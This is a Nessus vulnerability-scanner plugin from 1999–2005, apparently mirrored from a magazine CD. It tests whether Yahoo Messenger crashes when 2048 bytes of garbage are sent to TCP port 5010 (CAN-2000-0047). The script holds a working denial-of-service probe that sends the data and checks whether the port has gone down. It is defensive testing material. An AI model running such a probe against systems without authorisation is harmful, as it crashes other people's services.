home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / yahoo_dos.nasl < prev    next >
Text File  |  2005-03-31  |  1KB  |  60 lines

  1. #
  2. # This script was written by Noam Rathaus <noamr@securiteam.com>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. #
  7. if(description)
  8. {
  9.  script_id(10326);
  10.  script_version ("$Revision: 1.12 $");
  11.  script_cve_id("CAN-2000-0047");
  12.  
  13.  name["english"] = "Yahoo Messenger Denial of Service attack";
  14.  script_name(english:name["english"]);
  15.  
  16. desc["english"] = "
  17. It is possible to cause Yahoo Messenger to crash by sending a few bytes
  18. of garbage into its listening port TCP 5010.
  19.  
  20. Solution: Block those ports from outside communication
  21.  
  22. Risk factor : Low";
  23.  
  24.  script_description(english:desc["english"]);
  25.  
  26.  summary["english"] = "Yahoo Messenger Denial of Service attack";
  27.  script_summary(english:summary["english"]);
  28.  
  29.  script_category(ACT_DENIAL);
  30.  
  31.  script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");
  32.  family["english"] = "Denial of Service";
  33.  family["francais"] = "DΘni de service";
  34.  script_family(english:family["english"], francais:family["francais"]);
  35.  script_require_ports(5010);
  36.  
  37.  exit(0);
  38. }
  39.  
  40. #
  41. # The script code starts here
  42. #
  43.  
  44. if (get_port_state(5010))
  45. {
  46.  sock5010 = open_sock_tcp(5010);
  47.  if (sock5010)
  48.  {
  49.   send(socket:sock5010, data:crap(2048));
  50.   close(sock5010);
  51.  
  52.   sock5010_sec = open_sock_tcp(5010);
  53.   if ( !sock5010_sec )
  54.   {
  55.    security_hole(5010);
  56.   }
  57.   else close(sock5010_sec);
  58.  }
  59. }
  60.